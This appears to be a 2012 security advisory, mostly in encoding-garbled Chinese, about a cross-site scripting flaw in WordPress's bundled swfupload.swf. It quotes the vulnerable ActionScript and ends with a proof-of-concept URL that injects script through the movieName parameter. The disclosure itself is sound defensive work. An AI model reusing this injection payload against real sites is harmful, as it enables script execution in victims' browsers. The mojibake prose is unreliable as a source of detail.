WordPressXSS 

©

¶״̬



2012-05-18 ϵ̲ҵȴУϸڲ⹫
2012-05-18 Ѿ©ϸڹ


Ҫ

WordPressһʹPHPԿĲƽ̨û֧PHPMySQL ݿķϼԼ־Ҳ԰ WordPress һݹϵͳCMSʹáգⰲȫоԱWordPressڲֹʵϲ˲ȫĵXSS©ƭԱɹֱGETSHELL

ϸ˵

ԭģhttps://nealpoole.com/blog/2012/05/xss-and-csrf-via-swf-applets-swfupload-plupload/
 
wp-includes/js/swfupload/swfupload.swfзswfupload.swfԴExternalInterface.callĵڶ˰ȫ룬ںExternalInterface.callĵһûнаȫ롣еĲַɿأxss©
 
this.movieName = root.loaderInfo.parameters.movieName;
...
this.flashReady_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].flashReady";
...
if (ExternalCall.Bool(this.testExternalInterface_Callback)){
    ExternalCall.Simple(this.flashReady_Callback);
    this.hasCalledFlashReady = true;
}

=================
class ExternalCall extends Object{
...
        public static function Simple(param1:String) : void
        {
            ExternalInterface.call(param1);
            return;
        }

©֤

http://www.80sec.com/wp-includes/js/swfupload/swfupload.swf?movieName="])}catch(e){if(!window.x){window.x=1;alert(/xss/)}}//
